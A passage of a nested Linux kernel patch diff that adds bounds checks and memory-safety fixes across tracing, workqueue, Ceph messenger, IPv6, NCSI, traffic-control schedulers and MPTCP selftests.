+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -6679,6 +6679,7 @@ static int tracing_release_pipe(struct inode *inode, struct file *file)
+ 
+ 	free_cpumask_var(iter->started);
+ 	kfree(iter->fmt);
++	kfree(iter->temp);
+ 	mutex_destroy(&iter->mutex);
+ 	kfree(iter);
+ 
+@@ -8061,7 +8062,7 @@ static const struct file_operations tracing_err_log_fops = {
+ 	.open           = tracing_err_log_open,
+ 	.write		= tracing_err_log_write,
+ 	.read           = seq_read,
+-	.llseek         = seq_lseek,
++	.llseek         = tracing_lseek,
+ 	.release        = tracing_err_log_release,
+ };
+ 
+diff --git a/kernel/trace/trace_eprobe.c b/kernel/trace/trace_eprobe.c
+index 753fc536525d3..d2370cdb4c1d6 100644
+--- a/kernel/trace/trace_eprobe.c
++++ b/kernel/trace/trace_eprobe.c
+@@ -743,6 +743,7 @@ static int enable_trace_eprobe(struct trace_event_call *call,
+ 	struct trace_eprobe *ep;
+ 	bool enabled;
+ 	int ret = 0;
++	int cnt = 0;
+ 
+ 	tp = trace_probe_primary_from_call(call);
+ 	if (WARN_ON_ONCE(!tp))
+@@ -766,12 +767,25 @@ static int enable_trace_eprobe(struct trace_event_call *call,
+ 		if (ret)
+ 			break;
+ 		enabled = true;
++		cnt++;
+ 	}
+ 
+ 	if (ret) {
+ 		/* Failed to enable one of them. Roll back all */
+-		if (enabled)
+-			disable_eprobe(ep, file->tr);
++		if (enabled) {
++			/*
++			 * It's a bug if one failed for something other than memory
++			 * not being available but another eprobe succeeded.
++			 */
++			WARN_ON_ONCE(ret != -ENOMEM);
++
++			list_for_each_entry(pos, trace_probe_probe_list(tp), list) {
++				ep = container_of(pos, struct trace_eprobe, tp);
++				disable_eprobe(ep, file->tr);
++				if (!--cnt)
++					break;
++			}
++		}
+ 		if (file)
+ 			trace_probe_remove_file(tp, file);
+ 		else
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 75244d9e2bf9a..105253b9bc31d 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -6555,13 +6555,15 @@ static int event_hist_trigger_parse(struct event_command *cmd_ops,
+ 	if (get_named_trigger_data(trigger_data))
+ 		goto enable;
+ 
+-	if (has_hist_vars(hist_data))
+-		save_hist_vars(hist_data);
+-
+ 	ret = create_actions(hist_data);
+ 	if (ret)
+ 		goto out_unreg;
+ 
++	if (has_hist_vars(hist_data) || hist_data->n_var_refs) {
++		if (save_hist_vars(hist_data))
++			goto out_unreg;
++	}
++
+ 	ret = tracing_map_init(hist_data->map);
+ 	if (ret)
+ 		goto out_unreg;
+diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
+index 625cab4b9d945..bff699fe9e712 100644
+--- a/kernel/trace/trace_events_user.c
++++ b/kernel/trace/trace_events_user.c
+@@ -707,6 +707,9 @@ static int user_field_set_string(struct ftrace_event_field *field,
+ 	pos += snprintf(buf + pos, LEN_OR_ZERO, " ");
+ 	pos += snprintf(buf + pos, LEN_OR_ZERO, "%s", field->name);
+ 
++	if (str_has_prefix(field->type, "struct "))
++		pos += snprintf(buf + pos, LEN_OR_ZERO, " %d", field->size);
++
+ 	if (colon)
+ 		pos += snprintf(buf + pos, LEN_OR_ZERO, ";");
+ 
+@@ -1456,7 +1459,8 @@ static ssize_t user_events_write_core(struct file *file, struct iov_iter *i)
+ 
+ 		if (unlikely(faulted))
+ 			return -EFAULT;
+-	}
++	} else
++		return -EBADF;
+ 
+ 	return ret;
+ }
+diff --git a/kernel/trace/trace_probe_tmpl.h b/kernel/trace/trace_probe_tmpl.h
+index b3bdb8ddb8622..c293a607d5366 100644
+--- a/kernel/trace/trace_probe_tmpl.h
++++ b/kernel/trace/trace_probe_tmpl.h
+@@ -143,6 +143,8 @@ stage3:
+ array:
+ 	/* the last stage: Loop on array */
+ 	if (code->op == FETCH_OP_LP_ARRAY) {
++		if (ret < 0)
++			ret = 0;
+ 		total += ret;
+ 		if (++i < code->param) {
+ 			code = s3;
+@@ -204,11 +206,13 @@ store_trace_args(void *data, struct trace_probe *tp, void *rec,
+ 		if (unlikely(arg->dynamic))
+ 			*dl = make_data_loc(maxlen, dyndata - base);
+ 		ret = process_fetch_insn(arg->code, rec, dl, base);
+-		if (unlikely(ret < 0 && arg->dynamic)) {
+-			*dl = make_data_loc(0, dyndata - base);
+-		} else {
+-			dyndata += ret;
+-			maxlen -= ret;
++		if (arg->dynamic) {
++			if (unlikely(ret < 0)) {
++				*dl = make_data_loc(0, dyndata - base);
++			} else {
++				dyndata += ret;
++				maxlen -= ret;
++			}
+ 		}
+ 	}
+ }
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index 4dd494f786bcd..1e1557e42d2cc 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -698,12 +698,17 @@ static void clear_work_data(struct work_struct *work)
+ 	set_work_data(work, WORK_STRUCT_NO_POOL, 0);
+ }
+ 
++static inline struct pool_workqueue *work_struct_pwq(unsigned long data)
++{
++	return (struct pool_workqueue *)(data & WORK_STRUCT_WQ_DATA_MASK);
++}
++
+ static struct pool_workqueue *get_work_pwq(struct work_struct *work)
+ {
+ 	unsigned long data = atomic_long_read(&work->data);
+ 
+ 	if (data & WORK_STRUCT_PWQ)
+-		return (void *)(data & WORK_STRUCT_WQ_DATA_MASK);
++		return work_struct_pwq(data);
+ 	else
+ 		return NULL;
+ }
+@@ -731,8 +736,7 @@ static struct worker_pool *get_work_pool(struct work_struct *work)
+ 	assert_rcu_or_pool_mutex();
+ 
+ 	if (data & WORK_STRUCT_PWQ)
+-		return ((struct pool_workqueue *)
+-			(data & WORK_STRUCT_WQ_DATA_MASK))->pool;
++		return work_struct_pwq(data)->pool;
+ 
+ 	pool_id = data >> WORK_OFFQ_POOL_SHIFT;
+ 	if (pool_id == WORK_OFFQ_POOL_NONE)
+@@ -753,8 +757,7 @@ static int get_work_pool_id(struct work_struct *work)
+ 	unsigned long data = atomic_long_read(&work->data);
+ 
+ 	if (data & WORK_STRUCT_PWQ)
+-		return ((struct pool_workqueue *)
+-			(data & WORK_STRUCT_WQ_DATA_MASK))->pool->id;
++		return work_struct_pwq(data)->pool->id;
+ 
+ 	return data >> WORK_OFFQ_POOL_SHIFT;
+ }
+diff --git a/mm/kasan/kasan.h b/mm/kasan/kasan.h
+index abbcc1b0eec50..a898f05a2afd6 100644
+--- a/mm/kasan/kasan.h
++++ b/mm/kasan/kasan.h
+@@ -629,4 +629,7 @@ void __hwasan_storeN_noabort(unsigned long addr, size_t size);
+ 
+ void __hwasan_tag_memory(unsigned long addr, u8 tag, unsigned long size);
+ 
++void kasan_tag_mismatch(unsigned long addr, unsigned long access_info,
++			unsigned long ret_ip);
++
+ #endif /* __MM_KASAN_KASAN_H */
+diff --git a/net/ceph/messenger_v2.c b/net/ceph/messenger_v2.c
+index 3009028c4fa28..489baf2e6176c 100644
+--- a/net/ceph/messenger_v2.c
++++ b/net/ceph/messenger_v2.c
+@@ -392,6 +392,8 @@ static int head_onwire_len(int ctrl_len, bool secure)
+ 	int head_len;
+ 	int rem_len;
+ 
++	BUG_ON(ctrl_len < 0 || ctrl_len > CEPH_MSG_MAX_CONTROL_LEN);
++
+ 	if (secure) {
+ 		head_len = CEPH_PREAMBLE_SECURE_LEN;
+ 		if (ctrl_len > CEPH_PREAMBLE_INLINE_LEN) {
+@@ -410,6 +412,10 @@ static int head_onwire_len(int ctrl_len, bool secure)
+ static int __tail_onwire_len(int front_len, int middle_len, int data_len,
+ 			     bool secure)
+ {
++	BUG_ON(front_len < 0 || front_len > CEPH_MSG_MAX_FRONT_LEN ||
++	       middle_len < 0 || middle_len > CEPH_MSG_MAX_MIDDLE_LEN ||
++	       data_len < 0 || data_len > CEPH_MSG_MAX_DATA_LEN);
++
+ 	if (!front_len && !middle_len && !data_len)
+ 		return 0;
+ 
+@@ -522,29 +528,34 @@ static int decode_preamble(void *p, struct ceph_frame_desc *desc)
+ 		desc->fd_aligns[i] = ceph_decode_16(&p);
+ 	}
+ 
+-	/*
+-	 * This would fire for FRAME_TAG_WAIT (it has one empty
+-	 * segment), but we should never get it as client.
+-	 */
+-	if (!desc->fd_lens[desc->fd_seg_cnt - 1]) {
+-		pr_err("last segment empty\n");
++	if (desc->fd_lens[0] < 0 ||
++	    desc->fd_lens[0] > CEPH_MSG_MAX_CONTROL_LEN) {
++		pr_err("bad control segment length %d\n", desc->fd_lens[0]);
+ 		return -EINVAL;
+ 	}
+-
+-	if (desc->fd_lens[0] > CEPH_MSG_MAX_CONTROL_LEN) {
+-		pr_err("control segment too big %d\n", desc->fd_lens[0]);
++	if (desc->fd_lens[1] < 0 ||
++	    desc->fd_lens[1] > CEPH_MSG_MAX_FRONT_LEN) {
++		pr_err("bad front segment length %d\n", desc->fd_lens[1]);
+ 		return -EINVAL;
+ 	}
+-	if (desc->fd_lens[1] > CEPH_MSG_MAX_FRONT_LEN) {
+-		pr_err("front segment too big %d\n", desc->fd_lens[1]);
++	if (desc->fd_lens[2] < 0 ||
++	    desc->fd_lens[2] > CEPH_MSG_MAX_MIDDLE_LEN) {
++		pr_err("bad middle segment length %d\n", desc->fd_lens[2]);
+ 		return -EINVAL;
+ 	}
+-	if (desc->fd_lens[2] > CEPH_MSG_MAX_MIDDLE_LEN) {
+-		pr_err("middle segment too big %d\n", desc->fd_lens[2]);
++	if (desc->fd_lens[3] < 0 ||
++	    desc->fd_lens[3] > CEPH_MSG_MAX_DATA_LEN) {
++		pr_err("bad data segment length %d\n", desc->fd_lens[3]);
+ 		return -EINVAL;
+ 	}
+-	if (desc->fd_lens[3] > CEPH_MSG_MAX_DATA_LEN) {
+-		pr_err("data segment too big %d\n", desc->fd_lens[3]);
++
++	/*
++	 * This would fire for FRAME_TAG_WAIT (it has one empty
++	 * segment), but we should never get it as client.
++	 */
++	if (!desc->fd_lens[desc->fd_seg_cnt - 1]) {
++		pr_err("last segment empty, segment count %d\n",
++		       desc->fd_seg_cnt);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index ef9772b12624c..b6c16db86c719 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -4042,6 +4042,11 @@ struct sk_buff *skb_segment_list(struct sk_buff *skb,
+ 
+ 	skb_push(skb, -skb_network_offset(skb) + offset);
+ 
++	/* Ensure the head is writeable before touching the shared info */
++	err = skb_unclone(skb, GFP_ATOMIC);
++	if (err)
++		goto err_linearize;
++
+ 	skb_shinfo(skb)->frag_list = NULL;
+ 
+ 	while (list_skb) {
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index e6c7edcf68343..51bfc74805ecf 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -318,9 +318,8 @@ static void addrconf_del_dad_work(struct inet6_ifaddr *ifp)
+ static void addrconf_mod_rs_timer(struct inet6_dev *idev,
+ 				  unsigned long when)
+ {
+-	if (!timer_pending(&idev->rs_timer))
++	if (!mod_timer(&idev->rs_timer, jiffies + when))
+ 		in6_dev_hold(idev);
+-	mod_timer(&idev->rs_timer, jiffies + when);
+ }
+ 
+ static void addrconf_mod_dad_work(struct inet6_ifaddr *ifp,
+diff --git a/net/ipv6/icmp.c b/net/ipv6/icmp.c
+index 9d92d51c47577..e2af7ab992821 100644
+--- a/net/ipv6/icmp.c
++++ b/net/ipv6/icmp.c
+@@ -422,7 +422,10 @@ static struct net_device *icmp6_dev(const struct sk_buff *skb)
+ 	if (unlikely(dev->ifindex == LOOPBACK_IFINDEX || netif_is_l3_master(skb->dev))) {
+ 		const struct rt6_info *rt6 = skb_rt6_info(skb);
+ 
+-		if (rt6)
++		/* The destination could be an external IP in Ext Hdr (SRv6, RPL, etc.),
++		 * and ip6_null_entry could be set to skb if no route is found.
++		 */
++		if (rt6 && rt6->rt6i_idev)
+ 			dev = rt6->rt6i_idev->dev;
+ 	}
+ 
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index c029222ce46b0..04f1d696503cd 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -90,7 +90,7 @@ static u32 udp6_ehashfn(const struct net *net,
+ 	fhash = __ipv6_addr_jhash(faddr, udp_ipv6_hash_secret);
+ 
+ 	return __inet6_ehashfn(lhash, lport, fhash, fport,
+-			       udp_ipv6_hash_secret + net_hash_mix(net));
++			       udp6_ehash_secret + net_hash_mix(net));
+ }
+ 
+ int udp_v6_get_port(struct sock *sk, unsigned short snum)
+diff --git a/net/ncsi/ncsi-rsp.c b/net/ncsi/ncsi-rsp.c
+index 6447a09932f55..069c2659074bc 100644
+--- a/net/ncsi/ncsi-rsp.c
++++ b/net/ncsi/ncsi-rsp.c
+@@ -611,14 +611,14 @@ static int ncsi_rsp_handler_snfc(struct ncsi_request *nr)
+ 	return 0;
+ }
+ 
+-/* Response handler for Mellanox command Get Mac Address */
+-static int ncsi_rsp_handler_oem_mlx_gma(struct ncsi_request *nr)
++/* Response handler for Get Mac Address command */
++static int ncsi_rsp_handler_oem_gma(struct ncsi_request *nr, int mfr_id)
+ {
+ 	struct ncsi_dev_priv *ndp = nr->ndp;
+ 	struct net_device *ndev = ndp->ndev.dev;
+-	const struct net_device_ops *ops = ndev->netdev_ops;
+ 	struct ncsi_rsp_oem_pkt *rsp;
+ 	struct sockaddr saddr;
++	u32 mac_addr_off = 0;
+ 	int ret = 0;
+ 
+ 	/* Get the response header */
+@@ -626,11 +626,25 @@ static int ncsi_rsp_handler_oem_mlx_gma(struct ncsi_request *nr)
+ 
+ 	saddr.sa_family = ndev->type;
+ 	ndev->priv_flags |= IFF_LIVE_ADDR_CHANGE;
+-	memcpy(saddr.sa_data, &rsp->data[MLX_MAC_ADDR_OFFSET], ETH_ALEN);
++	if (mfr_id == NCSI_OEM_MFR_BCM_ID)
++		mac_addr_off = BCM_MAC_ADDR_OFFSET;
++	else if (mfr_id == NCSI_OEM_MFR_MLX_ID)
++		mac_addr_off = MLX_MAC_ADDR_OFFSET;
++	else if (mfr_id == NCSI_OEM_MFR_INTEL_ID)
++		mac_addr_off = INTEL_MAC_ADDR_OFFSET;
++
++	memcpy(saddr.sa_data, &rsp->data[mac_addr_off], ETH_ALEN);
++	if (mfr_id == NCSI_OEM_MFR_BCM_ID || mfr_id == NCSI_OEM_MFR_INTEL_ID)
++		eth_addr_inc((u8 *)saddr.sa_data);
++	if (!is_valid_ether_addr((const u8 *)saddr.sa_data))
++		return -ENXIO;
++
+ 	/* Set the flag for GMA command which should only be called once */
+ 	ndp->gma_flag = 1;
+ 
+-	ret = ops->ndo_set_mac_address(ndev, &saddr);
++	rtnl_lock();
++	ret = dev_set_mac_address(ndev, &saddr, NULL);
++	rtnl_unlock();
+ 	if (ret < 0)
+ 		netdev_warn(ndev, "NCSI: 'Writing mac address to device failed\n");
+ 
+@@ -649,41 +663,10 @@ static int ncsi_rsp_handler_oem_mlx(struct ncsi_request *nr)
+ 
+ 	if (mlx->cmd == NCSI_OEM_MLX_CMD_GMA &&
+ 	    mlx->param == NCSI_OEM_MLX_CMD_GMA_PARAM)
+-		return ncsi_rsp_handler_oem_mlx_gma(nr);
++		return ncsi_rsp_handler_oem_gma(nr, NCSI_OEM_MFR_MLX_ID);
+ 	return 0;
+ }
+ 
+-/* Response handler for Broadcom command Get Mac Address */
+-static int ncsi_rsp_handler_oem_bcm_gma(struct ncsi_request *nr)
+-{
+-	struct ncsi_dev_priv *ndp = nr->ndp;
+-	struct net_device *ndev = ndp->ndev.dev;
+-	const struct net_device_ops *ops = ndev->netdev_ops;
+-	struct ncsi_rsp_oem_pkt *rsp;
+-	struct sockaddr saddr;
+-	int ret = 0;
+-
+-	/* Get the response header */
+-	rsp = (struct ncsi_rsp_oem_pkt *)skb_network_header(nr->rsp);
+-
+-	saddr.sa_family = ndev->type;
+-	ndev->priv_flags |= IFF_LIVE_ADDR_CHANGE;
+-	memcpy(saddr.sa_data, &rsp->data[BCM_MAC_ADDR_OFFSET], ETH_ALEN);
+-	/* Increase mac address by 1 for BMC's address */
+-	eth_addr_inc((u8 *)saddr.sa_data);
+-	if (!is_valid_ether_addr((const u8 *)saddr.sa_data))
+-		return -ENXIO;
+-
+-	/* Set the flag for GMA command which should only be called once */
+-	ndp->gma_flag = 1;
+-
+-	ret = ops->ndo_set_mac_address(ndev, &saddr);
+-	if (ret < 0)
+-		netdev_warn(ndev, "NCSI: 'Writing mac address to device failed\n");
+-
+-	return ret;
+-}
+-
+ /* Response handler for Broadcom card */
+ static int ncsi_rsp_handler_oem_bcm(struct ncsi_request *nr)
+ {
+@@ -695,42 +678,10 @@ static int ncsi_rsp_handler_oem_bcm(struct ncsi_request *nr)
+ 	bcm = (struct ncsi_rsp_oem_bcm_pkt *)(rsp->data);
+ 
+ 	if (bcm->type == NCSI_OEM_BCM_CMD_GMA)
+-		return ncsi_rsp_handler_oem_bcm_gma(nr);
++		return ncsi_rsp_handler_oem_gma(nr, NCSI_OEM_MFR_BCM_ID);
+ 	return 0;
+ }
+ 
+-/* Response handler for Intel command Get Mac Address */
+-static int ncsi_rsp_handler_oem_intel_gma(struct ncsi_request *nr)
+-{
+-	struct ncsi_dev_priv *ndp = nr->ndp;
+-	struct net_device *ndev = ndp->ndev.dev;
+-	const struct net_device_ops *ops = ndev->netdev_ops;
+-	struct ncsi_rsp_oem_pkt *rsp;
+-	struct sockaddr saddr;
+-	int ret = 0;
+-
+-	/* Get the response header */
+-	rsp = (struct ncsi_rsp_oem_pkt *)skb_network_header(nr->rsp);
+-
+-	saddr.sa_family = ndev->type;
+-	ndev->priv_flags |= IFF_LIVE_ADDR_CHANGE;
+-	memcpy(saddr.sa_data, &rsp->data[INTEL_MAC_ADDR_OFFSET], ETH_ALEN);
+-	/* Increase mac address by 1 for BMC's address */
+-	eth_addr_inc((u8 *)saddr.sa_data);
+-	if (!is_valid_ether_addr((const u8 *)saddr.sa_data))
+-		return -ENXIO;
+-
+-	/* Set the flag for GMA command which should only be called once */
+-	ndp->gma_flag = 1;
+-
+-	ret = ops->ndo_set_mac_address(ndev, &saddr);
+-	if (ret < 0)
+-		netdev_warn(ndev,
+-			    "NCSI: 'Writing mac address to device failed\n");
+-
+-	return ret;
+-}
+-
+ /* Response handler for Intel card */
+ static int ncsi_rsp_handler_oem_intel(struct ncsi_request *nr)
+ {
+@@ -742,7 +693,7 @@ static int ncsi_rsp_handler_oem_intel(struct ncsi_request *nr)
+ 	intel = (struct ncsi_rsp_oem_intel_pkt *)(rsp->data);
+ 
+ 	if (intel->cmd == NCSI_OEM_INTEL_CMD_GMA)
+-		return ncsi_rsp_handler_oem_intel_gma(nr);
++		return ncsi_rsp_handler_oem_gma(nr, NCSI_OEM_MFR_INTEL_ID);
+ 
+ 	return 0;
+ }
+diff --git a/net/sched/cls_flower.c b/net/sched/cls_flower.c
+index 3de72e7c1075a..10e6ec0f94981 100644
+--- a/net/sched/cls_flower.c
++++ b/net/sched/cls_flower.c
+@@ -793,6 +793,16 @@ static int fl_set_key_port_range(struct nlattr **tb, struct fl_flow_key *key,
+ 		       TCA_FLOWER_KEY_PORT_SRC_MAX, &mask->tp_range.tp_max.src,
+ 		       TCA_FLOWER_UNSPEC, sizeof(key->tp_range.tp_max.src));
+ 
++	if (mask->tp_range.tp_min.dst != mask->tp_range.tp_max.dst) {
++		NL_SET_ERR_MSG(extack,
++			       "Both min and max destination ports must be specified");
++		return -EINVAL;
++	}
++	if (mask->tp_range.tp_min.src != mask->tp_range.tp_max.src) {
++		NL_SET_ERR_MSG(extack,
++			       "Both min and max source ports must be specified");
++		return -EINVAL;
++	}
+ 	if (mask->tp_range.tp_min.dst && mask->tp_range.tp_max.dst &&
+ 	    ntohs(key->tp_range.tp_max.dst) <=
+ 	    ntohs(key->tp_range.tp_min.dst)) {
+diff --git a/net/sched/cls_fw.c b/net/sched/cls_fw.c
+index a32351da968cd..1212b057b129c 100644
+--- a/net/sched/cls_fw.c
++++ b/net/sched/cls_fw.c
+@@ -210,11 +210,6 @@ static int fw_set_parms(struct net *net, struct tcf_proto *tp,
+ 	if (err < 0)
+ 		return err;
+ 
+-	if (tb[TCA_FW_CLASSID]) {
+-		f->res.classid = nla_get_u32(tb[TCA_FW_CLASSID]);
+-		tcf_bind_filter(tp, &f->res, base);
+-	}
+-
+ 	if (tb[TCA_FW_INDEV]) {
+ 		int ret;
+ 		ret = tcf_change_indev(net, tb[TCA_FW_INDEV], extack);
+@@ -231,6 +226,11 @@ static int fw_set_parms(struct net *net, struct tcf_proto *tp,
+ 	} else if (head->mask != 0xFFFFFFFF)
+ 		return err;
+ 
++	if (tb[TCA_FW_CLASSID]) {
++		f->res.classid = nla_get_u32(tb[TCA_FW_CLASSID]);
++		tcf_bind_filter(tp, &f->res, base);
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
+index 02098a02943eb..e150d08f182d8 100644
+--- a/net/sched/sch_qfq.c
++++ b/net/sched/sch_qfq.c
+@@ -113,6 +113,7 @@
+ 
+ #define QFQ_MTU_SHIFT		16	/* to support TSO/GSO */
+ #define QFQ_MIN_LMAX		512	/* see qfq_slot_insert */
++#define QFQ_MAX_LMAX		(1UL << QFQ_MTU_SHIFT)
+ 
+ #define QFQ_MAX_AGG_CLASSES	8 /* max num classes per aggregate allowed */
+ 
+@@ -214,9 +215,14 @@ static struct qfq_class *qfq_find_class(struct Qdisc *sch, u32 classid)
+ 	return container_of(clc, struct qfq_class, common);
+ }
+ 
++static struct netlink_range_validation lmax_range = {
++	.min = QFQ_MIN_LMAX,
++	.max = QFQ_MAX_LMAX,
++};
++
+ static const struct nla_policy qfq_policy[TCA_QFQ_MAX + 1] = {
+-	[TCA_QFQ_WEIGHT] = { .type = NLA_U32 },
+-	[TCA_QFQ_LMAX] = { .type = NLA_U32 },
++	[TCA_QFQ_WEIGHT] = NLA_POLICY_RANGE(NLA_U32, 1, QFQ_MAX_WEIGHT),
++	[TCA_QFQ_LMAX] = NLA_POLICY_FULL_RANGE(NLA_U32, &lmax_range),
+ };
+ 
+ /*
+@@ -375,8 +381,13 @@ static int qfq_change_agg(struct Qdisc *sch, struct qfq_class *cl, u32 weight,
+ 			   u32 lmax)
+ {
+ 	struct qfq_sched *q = qdisc_priv(sch);
+-	struct qfq_aggregate *new_agg = qfq_find_agg(q, lmax, weight);
++	struct qfq_aggregate *new_agg;
++
++	/* 'lmax' can range from [QFQ_MIN_LMAX, pktlen + stab overhead] */
++	if (lmax > QFQ_MAX_LMAX)
++		return -EINVAL;
+ 
++	new_agg = qfq_find_agg(q, lmax, weight);
+ 	if (new_agg == NULL) { /* create new aggregate */
+ 		new_agg = kzalloc(sizeof(*new_agg), GFP_ATOMIC);
+ 		if (new_agg == NULL)
+@@ -408,27 +419,25 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
+ 	}
+ 
+ 	err = nla_parse_nested_deprecated(tb, TCA_QFQ_MAX, tca[TCA_OPTIONS],
+-					  qfq_policy, NULL);
++					  qfq_policy, extack);
+ 	if (err < 0)
+ 		return err;
+ 
+-	if (tb[TCA_QFQ_WEIGHT]) {
++	if (tb[TCA_QFQ_WEIGHT])
+ 		weight = nla_get_u32(tb[TCA_QFQ_WEIGHT]);
+-		if (!weight || weight > (1UL << QFQ_MAX_WSHIFT)) {
+-			pr_notice("qfq: invalid weight %u\n", weight);
+-			return -EINVAL;
+-		}
+-	} else
++	else
+ 		weight = 1;
+ 
+-	if (tb[TCA_QFQ_LMAX])
++	if (tb[TCA_QFQ_LMAX]) {
+ 		lmax = nla_get_u32(tb[TCA_QFQ_LMAX]);
+-	else
++	} else {
++		/* MTU size is user controlled */
+ 		lmax = psched_mtu(qdisc_dev(sch));
+-
+-	if (lmax < QFQ_MIN_LMAX || lmax > (1UL << QFQ_MTU_SHIFT)) {
+-		pr_notice("qfq: invalid max length %u\n", lmax);
+-		return -EINVAL;
++		if (lmax < QFQ_MIN_LMAX || lmax > QFQ_MAX_LMAX) {
++			NL_SET_ERR_MSG_MOD(extack,
++					   "MTU size out of bounds for qfq");
++			return -EINVAL;
++		}
+ 	}
+ 
+ 	inv_w = ONE_FP / weight;
+diff --git a/samples/ftrace/ftrace-direct-too.c b/samples/ftrace/ftrace-direct-too.c
+index 6690468c5cc2d..14c6859e1ac41 100644
+--- a/samples/ftrace/ftrace-direct-too.c
++++ b/samples/ftrace/ftrace-direct-too.c
+@@ -5,14 +5,14 @@
+ #include <linux/ftrace.h>
+ #include <asm/asm-offsets.h>
+ 
+-extern void my_direct_func(struct vm_area_struct *vma,
+-			   unsigned long address, unsigned int flags);
++extern void my_direct_func(struct vm_area_struct *vma, unsigned long address,
++			   unsigned int flags, struct pt_regs *regs);
+ 
+-void my_direct_func(struct vm_area_struct *vma,
+-			unsigned long address, unsigned int flags)
++void my_direct_func(struct vm_area_struct *vma, unsigned long address,
++		    unsigned int flags, struct pt_regs *regs)
+ {
+-	trace_printk("handle mm fault vma=%p address=%lx flags=%x\n",
+-		     vma, address, flags);
++	trace_printk("handle mm fault vma=%p address=%lx flags=%x regs=%p\n",
++		     vma, address, flags, regs);
+ }
+ 
+ extern void my_tramp(void *);
+@@ -32,7 +32,9 @@ asm (
+ "	pushq %rdi\n"
+ "	pushq %rsi\n"
+ "	pushq %rdx\n"
++"	pushq %rcx\n"
+ "	call my_direct_func\n"
++"	popq %rcx\n"
+ "	popq %rdx\n"
+ "	popq %rsi\n"
+ "	popq %rdi\n"
+diff --git a/tools/testing/selftests/net/mptcp/config b/tools/testing/selftests/net/mptcp/config
+index 6032f9b23c4c2..e317c2e44dae8 100644
+--- a/tools/testing/selftests/net/mptcp/config
++++ b/tools/testing/selftests/net/mptcp/config
+@@ -6,6 +6,7 @@ CONFIG_INET_DIAG=m
+ CONFIG_INET_MPTCP_DIAG=m
+ CONFIG_VETH=y
+ CONFIG_NET_SCH_NETEM=m
++CONFIG_SYN_COOKIES=y
+ CONFIG_NETFILTER=y
+ CONFIG_NETFILTER_ADVANCED=y
+ CONFIG_NETFILTER_NETLINK=m
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.sh b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+index 36dc2bab7a13c..18c9b00ca058e 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+@@ -719,6 +719,7 @@ table inet mangle {
+ EOF
+ 	if [ $? -ne 0 ]; then
+ 		echo "SKIP: $msg, could not load nft ruleset"
++		mptcp_lib_fail_if_expected_feature "nft rules"
+ 		return
+ 	fi
+ 
+@@ -734,6 +735,7 @@ EOF
+ 	if [ $? -ne 0 ]; then
+ 		ip netns exec "$listener_ns" nft flush ruleset
+ 		echo "SKIP: $msg, ip $r6flag rule failed"
++		mptcp_lib_fail_if_expected_feature "ip rule"
+ 		return
+ 	fi
+ 
+@@ -742,6 +744,7 @@ EOF
+ 		ip netns exec "$listener_ns" nft flush ruleset
+ 		ip -net "$listener_ns" $r6flag rule del fwmark 1 lookup 100
+ 		echo "SKIP: $msg, ip route add local $local_addr failed"
++		mptcp_lib_fail_if_expected_feature "ip route"
+ 		return
+ 	fi
+ 
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+index a493eaf8633fc..af4fccd4f5cc0 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+@@ -121,6 +121,7 @@ check_mark()
+ 	for v in $values; do
+ 		if [ $v -ne 0 ]; then
+ 			echo "FAIL: got $tables $values in ns $ns , not 0 - not all expected packets marked" 1>&2
++			ret=1
+ 			return 1
+ 		fi
+ 	done
+@@ -220,11 +221,11 @@ do_transfer()
+ 	fi
+ 
+ 	if [ $local_addr = "::" ];then
+-		check_mark $listener_ns 6
+-		check_mark $connector_ns 6
++		check_mark $listener_ns 6 || retc=1
++		check_mark $connector_ns 6 || retc=1
+ 	else
+-		check_mark $listener_ns 4
+-		check_mark $connector_ns 4
++		check_mark $listener_ns 4 || retc=1
++		check_mark $connector_ns 4 || retc=1
+ 	fi
+ 
+ 	check_transfer $cin $sout "file received by server"
+diff --git a/tools/testing/selftests/net/mptcp/pm_nl_ctl.c b/tools/testing/selftests/net/mptcp/pm_nl_ctl.c
+index abddf4c63e797..1887bd61bd9a5 100644
+--- a/tools/testing/selftests/net/mptcp/pm_nl_ctl.c
++++ b/tools/testing/selftests/net/mptcp/pm_nl_ctl.c
+@@ -425,7 +425,7 @@ int dsf(int fd, int pm_family, int argc, char *argv[])
+ 	}
+ 
+ 	/* token */
+-	token = atoi(params[4]);
++	token = strtoul(params[4], NULL, 10);
+ 	rta = (void *)(data + off);
+ 	rta->rta_type = MPTCP_PM_ATTR_TOKEN;
+ 	rta->rta_len = RTA_LENGTH(4);
+@@ -551,7 +551,7 @@ int csf(int fd, int pm_family, int argc, char *argv[])
+ 	}
+ 
+ 	/* token */
+-	token = atoi(params[4]);
++	token = strtoul(params[4], NULL, 10);
+ 	rta = (void *)(data + off);
+ 	rta->rta_type = MPTCP_PM_ATTR_TOKEN;
+ 	rta->rta_len = RTA_LENGTH(4);
+@@ -598,7 +598,7 @@ int remove_addr(int fd, int pm_family, int argc, char *argv[])
+ 			if (++arg >= argc)
+ 				error(1, 0, " missing token value");
+ 
+-			token = atoi(argv[arg]);
++			token = strtoul(argv[arg], NULL, 10);
+ 			rta = (void *)(data + off);
